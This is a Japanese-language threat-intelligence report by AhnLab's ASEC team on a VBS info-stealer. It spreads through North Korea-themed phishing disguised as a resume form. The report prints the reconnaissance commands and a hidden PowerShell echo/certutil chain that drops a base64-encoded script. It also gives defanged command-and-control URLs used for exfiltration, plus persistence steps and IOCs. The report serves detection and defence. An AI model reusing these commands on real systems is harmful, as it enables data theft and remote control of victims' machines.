ASEC 分析チームは最近、対北朝鮮関連の内容のフィッシングメールを通じて、情報流出を目的とした不正な VBS が拡散していることを確認した。対北朝鮮関連の放送出演オファーの内容が記載されており、圧縮ファイルが添付されている。履歴書の作成について言及しており、添付されたファイルの実行を誘導している。圧縮ファイルの中には不正な VBS スクリプトファイルが存在する。
「2022 履歴書フォーム.vbs」ファイルの簡略化した振る舞いは以下の通りである。
- 情報収集および転送
- 正常なアレアハングルファイルの生成
- 追加の不正なスクリプトファイルの生成およびタスクスケジューラの登録
VBS ファイルを実行すると、以下のコマンドによってユーザー PC の情報を収集する。
| 収集情報 | コマンド |
|---|---|
| 現在実行中のプロセスリスト | cmd /c tasklist /v | clip |
| ルーティングテーブル情報 | cmd /c Route print | clip |
| Program Files フォルダー情報 | cmd /c dir /w “”%SystemRoot%/../Program Files”” | clip |
| Program Files (x86) フォルダー情報 | cmd /c dir /w “”%SystemRoot%/../Program Files (x86)”” | clip |
その後、収集した情報を Base64 でエンコードしたあと hxxp://fserverone.webcindario[.]com/contri/sqlite/msgbugPlog.php へ転送する。
- パラメータ値 : Cache=error&Sand=[User 名]&Data=[base64 でエンコードした収集情報]&Em=[base64 でエンコードしたユーザー名]
また、正常なファイルを装うために「2022 履歴書フォーム.vbs」ファイルを実行したフォルダーに「2022.hwp」コマンドで生成されたアレアハングル形式のファイルを実行する。アレアハングル形式のファイルは、以下のように履歴書フォームの形を取っている。
その後、情報を転送した URL から受信したレスポンスに存在するデータを PowerShell を利用して実行する。また、このレスポンスによって生成された %appdata%\mscornet.vbs ファイルを Google Update Source Link という名前でタスクスケジューラに登録する。これに加えて、スタートアッププログラムフォルダーに mscornet.vbs をコピーして VBS ファイルが自動で実行されるようにしたあと「2022 履歴書フォーム.vbs」ファイルを自己削除する。
現在は情報を転送した hxxp://fserverone.webcindario[.]com/contri/sqlite/msgbugPlog.php からこれといったレスポンスは受信されないが、当社の自動解析システム RAPIT に記録されている受信レスポンス(3/26確認)には、追加のコマンドが存在する。
このレスポンスメッセージは PowerShell を利用して base64 でエンコードされたデータを %AppData%\~KB3241.tmp に保存する。その後 ~KB3241.tmp をデコードして %AppData%\mscornet.vbs に保存したあと ~KB3241.tmp を削除する。
powershell -w hidden ECHO OFF echo RnVuY3Rpb24gaDJzKGgpDQogIERpbSBhIDogYSA9IFNwbGl0KGgpDQogIERpbSBp > "%AppData%\~KB3241.tmp"
echo DQogIEZvciBpID0gMCBUbyBVQm91bmQoYSkNCiAgICAgIGEoaSkgPSBDaHIoIiYi >> "%AppData%\~KB3241.tmp"
<省略>
echo ZSINCmtpbGxQcm9jZXNzICJpZWxvd3V0aWwuZXhlIg== >> "%AppData%\~KB3241.tmp"
certutil -f -decode "%AppData%\~KB3241.tmp" "%AppData%\mscornet.vbs"
del "%AppData%\~KB3241.tmp"mscornet.vbs は hxxp://cmaildowninvoice.webcindario[.]com/contri/sqlite/msgbugGlog.php?Cache=fail&Sand=[PC名] に接続して受け取ったレスポンスを Execute コマンドによって実行する。現在、この URL から追加のコマンドは確認できないが、攻撃者により様々な不正な振る舞いを実行することができる。
最近、対北朝鮮関連の内容を装ったマルウェアが Word ドキュメント形式だけでなく VBS スクリプト形式でも出回っており、ユーザーの注意が要求される。
現在 AhnLab V3 製品は、当該ファイルに対して以下の通り検知している。
[ファイル検知]
Dropper/VBS.Generic
Trojan/VBS.Agent
[IOC]
ab97956fec732676ecfcedf55efadcbc
e49e41a810730f4bf3d43178e4c84ee5
hxxp://fserverone.webcindario[.]com/contri/sqlite/msgbugPlog.php
hxxp://cmaildowninvoice.webcindario[.]com/contri/sqlite/ msgbugGlog.php
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報